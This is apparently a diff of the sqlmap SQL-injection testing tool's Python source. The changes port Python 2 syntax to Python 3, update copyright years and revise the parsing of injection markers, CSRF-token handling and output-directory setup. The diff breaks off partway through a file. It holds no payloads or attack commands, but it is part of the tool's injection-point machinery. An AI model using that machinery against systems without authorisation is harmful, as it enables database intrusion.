"pwd": None, "uname": None, "id": None,
|
"pwd": None, "uname": None, "id": None,
|
||||||
})
|
})
|
||||||
|
|
||||||
readline.set_completer(completer.complete)
|
readline.set_completer(completer.complete)
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|||||||
@@ -1,14 +1,13 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import errno
|
import errno
|
||||||
import os
|
import os
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
|
||||||
import time
|
import time
|
||||||
|
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
@@ -24,11 +23,6 @@ else:
|
|||||||
import select
|
import select
|
||||||
import fcntl
|
import fcntl
|
||||||
|
|
||||||
if (sys.hexversion >> 16) >= 0x202:
|
|
||||||
FCNTL = fcntl
|
|
||||||
else:
|
|
||||||
import FCNTL
|
|
||||||
|
|
||||||
def blockingReadFromFD(fd):
|
def blockingReadFromFD(fd):
|
||||||
# Quick twist around original Twisted function
|
# Quick twist around original Twisted function
|
||||||
# Blocking read from a non-blocking file descriptor
|
# Blocking read from a non-blocking file descriptor
|
||||||
@@ -37,7 +31,7 @@ def blockingReadFromFD(fd):
|
|||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
output += os.read(fd, 8192)
|
output += os.read(fd, 8192)
|
||||||
except (OSError, IOError), ioe:
|
except (OSError, IOError) as ioe:
|
||||||
if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
|
if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
|
||||||
# Uncomment the following line if the process seems to
|
# Uncomment the following line if the process seems to
|
||||||
# take a huge amount of cpu time
|
# take a huge amount of cpu time
|
||||||
@@ -58,7 +52,7 @@ def blockingWriteToFD(fd, data):
|
|||||||
try:
|
try:
|
||||||
data_length = len(data)
|
data_length = len(data)
|
||||||
wrote_data = os.write(fd, data)
|
wrote_data = os.write(fd, data)
|
||||||
except (OSError, IOError), io:
|
except (OSError, IOError) as io:
|
||||||
if io.errno in (errno.EAGAIN, errno.EINTR):
|
if io.errno in (errno.EAGAIN, errno.EINTR):
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
@@ -101,8 +95,8 @@ class Popen(subprocess.Popen):
|
|||||||
(errCode, written) = WriteFile(x, input)
|
(errCode, written) = WriteFile(x, input)
|
||||||
except ValueError:
|
except ValueError:
|
||||||
return self._close('stdin')
|
return self._close('stdin')
|
||||||
except (subprocess.pywintypes.error, Exception), why:
|
except (subprocess.pywintypes.error, Exception) as ex:
|
||||||
if why[0] in (109, errno.ESHUTDOWN):
|
if ex[0] in (109, errno.ESHUTDOWN):
|
||||||
return self._close('stdin')
|
return self._close('stdin')
|
||||||
raise
|
raise
|
||||||
|
|
||||||
@@ -122,8 +116,8 @@ class Popen(subprocess.Popen):
|
|||||||
(errCode, read) = ReadFile(x, nAvail, None)
|
(errCode, read) = ReadFile(x, nAvail, None)
|
||||||
except (ValueError, NameError):
|
except (ValueError, NameError):
|
||||||
return self._close(which)
|
return self._close(which)
|
||||||
except (subprocess.pywintypes.error, Exception), why:
|
except (subprocess.pywintypes.error, Exception) as ex:
|
||||||
if why[0] in (109, errno.ESHUTDOWN):
|
if ex[0] in (109, errno.ESHUTDOWN):
|
||||||
return self._close(which)
|
return self._close(which)
|
||||||
raise
|
raise
|
||||||
|
|
||||||
@@ -140,8 +134,8 @@ class Popen(subprocess.Popen):
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
written = os.write(self.stdin.fileno(), input)
|
written = os.write(self.stdin.fileno(), input)
|
||||||
except OSError, why:
|
except OSError as ex:
|
||||||
if why[0] == errno.EPIPE: # broken pipe
|
if ex[0] == errno.EPIPE: # broken pipe
|
||||||
return self._close('stdin')
|
return self._close('stdin')
|
||||||
raise
|
raise
|
||||||
|
|
||||||
|
|||||||
@@ -1,11 +1,10 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
|
||||||
import functools
|
import functools
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
@@ -45,6 +44,7 @@ from lib.core.enums import POST_HINT
|
|||||||
from lib.core.exception import SqlmapFilePathException
|
from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.option import _setDBMS
|
from lib.core.option import _setDBMS
|
||||||
@@ -52,9 +52,11 @@ from lib.core.option import _setKnowledgeBaseAttributes
|
|||||||
from lib.core.option import _setAuthCred
|
from lib.core.option import _setAuthCred
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||||
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import HOST_ALIASES
|
from lib.core.settings import HOST_ALIASES
|
||||||
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||||
|
from lib.core.settings import INJECT_HERE_REGEX
|
||||||
from lib.core.settings import JSON_RECOGNITION_REGEX
|
from lib.core.settings import JSON_RECOGNITION_REGEX
|
||||||
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
||||||
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
||||||
@@ -62,6 +64,7 @@ from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
|||||||
from lib.core.settings import REFERER_ALIASES
|
from lib.core.settings import REFERER_ALIASES
|
||||||
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
||||||
from lib.core.settings import RESULTS_FILE_FORMAT
|
from lib.core.settings import RESULTS_FILE_FORMAT
|
||||||
|
from lib.core.settings import SESSION_SQLITE_FILE
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
@@ -82,6 +85,7 @@ def _setRequestParams():
|
|||||||
conf.parameters[None] = "direct connection"
|
conf.parameters[None] = "direct connection"
|
||||||
return
|
return
|
||||||
|
|
||||||
|
hintNames = []
|
||||||
testableParameters = False
|
testableParameters = False
|
||||||
|
|
||||||
# Perform checks on GET parameters
|
# Perform checks on GET parameters
|
||||||
@@ -100,7 +104,6 @@ def _setRequestParams():
|
|||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
||||||
hintNames = []
|
|
||||||
|
|
||||||
def process(match, repl):
|
def process(match, repl):
|
||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
@@ -141,14 +144,14 @@ def _setRequestParams():
|
|||||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||||
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||||
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||||
_ = match.group(2)
|
_ = match.group(2)
|
||||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
|
_ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _)
|
||||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
|
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _)
|
||||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||||
|
|
||||||
kb.postHint = POST_HINT.JSON
|
kb.postHint = POST_HINT.JSON
|
||||||
@@ -229,9 +232,9 @@ def _setRequestParams():
|
|||||||
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
|
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
|
||||||
conf.parameters[PLACE.POST] = conf.data
|
conf.parameters[PLACE.POST] = conf.data
|
||||||
|
|
||||||
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
|
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks
|
||||||
|
|
||||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
|
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
|
||||||
warnMsg = "you've provided target URL without any GET "
|
warnMsg = "you've provided target URL without any GET "
|
||||||
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
||||||
warnMsg += "and without providing any POST parameters "
|
warnMsg += "and without providing any POST parameters "
|
||||||
@@ -343,7 +346,7 @@ def _setRequestParams():
|
|||||||
# Url encoding of the header values should be avoided
|
# Url encoding of the header values should be avoided
|
||||||
# Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
|
# Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
|
||||||
|
|
||||||
if httpHeader.title() == HTTP_HEADER.USER_AGENT:
|
if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper():
|
||||||
conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
|
conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
|
||||||
|
|
||||||
condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True)))
|
condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True)))
|
||||||
@@ -352,7 +355,7 @@ def _setRequestParams():
|
|||||||
conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
|
conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
|
||||||
testableParameters = True
|
testableParameters = True
|
||||||
|
|
||||||
elif httpHeader.title() == HTTP_HEADER.REFERER:
|
elif httpHeader.upper() == HTTP_HEADER.REFERER.upper():
|
||||||
conf.parameters[PLACE.REFERER] = urldecode(headerValue)
|
conf.parameters[PLACE.REFERER] = urldecode(headerValue)
|
||||||
|
|
||||||
condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True)))
|
condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True)))
|
||||||
@@ -361,7 +364,7 @@ def _setRequestParams():
|
|||||||
conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
|
conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
|
||||||
testableParameters = True
|
testableParameters = True
|
||||||
|
|
||||||
elif httpHeader.title() == HTTP_HEADER.HOST:
|
elif httpHeader.upper() == HTTP_HEADER.HOST.upper():
|
||||||
conf.parameters[PLACE.HOST] = urldecode(headerValue)
|
conf.parameters[PLACE.HOST] = urldecode(headerValue)
|
||||||
|
|
||||||
condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True)))
|
condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True)))
|
||||||
@@ -376,7 +379,7 @@ def _setRequestParams():
|
|||||||
if condition:
|
if condition:
|
||||||
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
|
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
|
||||||
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
|
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
|
||||||
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
|
conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
|
||||||
testableParameters = True
|
testableParameters = True
|
||||||
|
|
||||||
if not conf.parameters:
|
if not conf.parameters:
|
||||||
@@ -390,20 +393,26 @@ def _setRequestParams():
|
|||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||||
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original
|
||||||
errMsg += "found in provided GET, POST, Cookie or header values"
|
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
else:
|
else:
|
||||||
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||||
|
if conf.csrfToken:
|
||||||
|
break
|
||||||
|
|
||||||
for parameter in conf.paramDict.get(place, {}):
|
for parameter in conf.paramDict.get(place, {}):
|
||||||
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||||
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||||
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||||
|
|
||||||
if readInput(message, default='N', boolean=True):
|
if readInput(message, default='N', boolean=True):
|
||||||
conf.csrfToken = getUnicode(parameter)
|
class _(unicode):
|
||||||
break
|
pass
|
||||||
|
conf.csrfToken = _(re.escape(getUnicode(parameter)))
|
||||||
|
conf.csrfToken._original = getUnicode(parameter)
|
||||||
|
break
|
||||||
|
|
||||||
def _setHashDB():
|
def _setHashDB():
|
||||||
"""
|
"""
|
||||||
@@ -411,15 +420,15 @@ def _setHashDB():
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.hashDBFile:
|
if not conf.hashDBFile:
|
||||||
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
|
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE)
|
||||||
|
|
||||||
if os.path.exists(conf.hashDBFile):
|
if os.path.exists(conf.hashDBFile):
|
||||||
if conf.flushSession:
|
if conf.flushSession:
|
||||||
try:
|
try:
|
||||||
os.remove(conf.hashDBFile)
|
os.remove(conf.hashDBFile)
|
||||||
logger.info("flushing session file")
|
logger.info("flushing session file")
|
||||||
except OSError, msg:
|
except OSError as ex:
|
||||||
errMsg = "unable to flush the session file (%s)" % msg
|
errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapFilePathException(errMsg)
|
raise SqlmapFilePathException(errMsg)
|
||||||
|
|
||||||
conf.hashDB = HashDB(conf.hashDBFile)
|
conf.hashDB = HashDB(conf.hashDBFile)
|
||||||
@@ -445,13 +454,10 @@ def _resumeHashDBValues():
|
|||||||
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
||||||
|
|
||||||
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
||||||
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
|
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:
|
||||||
injection.parameter in conf.paramDict[injection.place]:
|
|
||||||
|
|
||||||
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
||||||
if intersect(conf.tech, injection.data.keys()):
|
if intersect(conf.tech, injection.data.keys()):
|
||||||
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
|
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
|
||||||
|
|
||||||
if injection not in kb.injections:
|
if injection not in kb.injections:
|
||||||
kb.injections.append(injection)
|
kb.injections.append(injection)
|
||||||
|
|
||||||
@@ -466,7 +472,13 @@ def _resumeDBMS():
|
|||||||
value = hashDBRetrieve(HASHDB_KEYS.DBMS)
|
value = hashDBRetrieve(HASHDB_KEYS.DBMS)
|
||||||
|
|
||||||
if not value:
|
if not value:
|
||||||
return
|
if conf.offline:
|
||||||
|
errMsg = "unable to continue in offline mode "
|
||||||
|
errMsg += "because of lack of usable "
|
||||||
|
errMsg += "session data"
|
||||||
|
raise SqlmapNoneDataException(errMsg)
|
||||||
|
else:
|
||||||
|
return
|
||||||
|
|
||||||
dbms = value.lower()
|
dbms = value.lower()
|
||||||
dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
||||||
@@ -546,7 +558,7 @@ def _setResultsFile():
|
|||||||
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
||||||
try:
|
try:
|
||||||
conf.resultsFP = openFile(conf.resultsFilename, "a", UNICODE_ENCODING, buffering=0)
|
conf.resultsFP = openFile(conf.resultsFilename, "a", UNICODE_ENCODING, buffering=0)
|
||||||
except (OSError, IOError), ex:
|
except (OSError, IOError) as ex:
|
||||||
try:
|
try:
|
||||||
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
||||||
handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")
|
handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")
|
||||||
@@ -554,7 +566,7 @@ def _setResultsFile():
|
|||||||
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||||
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
|
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
except IOError, _:
|
except IOError as _:
|
||||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
errMsg += "Please make sure that your disk is not full and "
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
errMsg += "that you have sufficient write permissions to "
|
errMsg += "that you have sufficient write permissions to "
|
||||||
@@ -570,15 +582,15 @@ def _createFilesDir():
|
|||||||
Create the file directory.
|
Create the file directory.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.rFile:
|
if not conf.fileRead:
|
||||||
return
|
return
|
||||||
|
|
||||||
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
|
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
|
||||||
|
|
||||||
if not os.path.isdir(conf.filePath):
|
if not os.path.isdir(conf.filePath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.filePath, 0755)
|
os.makedirs(conf.filePath)
|
||||||
except OSError, ex:
|
except OSError as ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
||||||
warnMsg = "unable to create files directory "
|
warnMsg = "unable to create files directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
|
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
|
||||||
@@ -599,8 +611,8 @@ def _createDumpDir():
|
|||||||
|
|
||||||
if not os.path.isdir(conf.dumpPath):
|
if not os.path.isdir(conf.dumpPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.dumpPath, 0755)
|
os.makedirs(conf.dumpPath)
|
||||||
except OSError, ex:
|
except OSError as ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
||||||
warnMsg = "unable to create dump directory "
|
warnMsg = "unable to create dump directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
|
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
|
||||||
@@ -618,43 +630,45 @@ def _createTargetDirs():
|
|||||||
Create the output directory.
|
Create the output directory.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
for context in "output", "history":
|
||||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
directory = paths["SQLMAP_%s_PATH" % context.upper()]
|
||||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
|
||||||
|
|
||||||
_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
|
|
||||||
open(_, "w+b").close()
|
|
||||||
os.remove(_)
|
|
||||||
|
|
||||||
if conf.outputDir:
|
|
||||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
except (OSError, IOError), ex:
|
|
||||||
try:
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
if not os.path.isdir(directory):
|
||||||
except Exception, _:
|
os.makedirs(directory)
|
||||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
|
||||||
errMsg += "Please make sure that your disk is not full and "
|
|
||||||
errMsg += "that you have sufficient write permissions to "
|
|
||||||
errMsg += "create temporary files and/or directories"
|
|
||||||
raise SqlmapSystemException(errMsg)
|
|
||||||
|
|
||||||
warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the")
|
_ = os.path.join(directory, randomStr())
|
||||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
open(_, "w+b").close()
|
||||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
os.remove(_)
|
||||||
logger.warn(warnMsg)
|
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
if conf.outputDir and context == "output":
|
||||||
|
warnMsg = "using '%s' as the %s directory" % (directory, context)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
except (OSError, IOError) as ex:
|
||||||
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context)
|
||||||
|
except Exception as _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context)
|
||||||
|
warnMsg += "'%s' (%s). " % (directory, getUnicode(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
paths["SQLMAP_%s_PATH" % context.upper()] = tempDir
|
||||||
|
|
||||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if not os.path.isdir(conf.outputPath):
|
if not os.path.isdir(conf.outputPath):
|
||||||
os.makedirs(conf.outputPath, 0755)
|
os.makedirs(conf.outputPath)
|
||||||
except (OSError, IOError, TypeError), ex:
|
except (OSError, IOError, TypeError) as ex:
|
||||||
try:
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
except Exception, _:
|
except Exception as _:
|
||||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
errMsg += "Please make sure that your disk is not full and "
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
errMsg += "that you have sufficient write permissions to "
|
errMsg += "that you have sufficient write permissions to "
|
||||||
@@ -668,14 +682,16 @@ def _createTargetDirs():
|
|||||||
|
|
||||||
conf.outputPath = tempDir
|
conf.outputPath = tempDir
|
||||||
|
|
||||||
|
conf.outputPath = getUnicode(conf.outputPath)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
|
with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f:
|
||||||
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
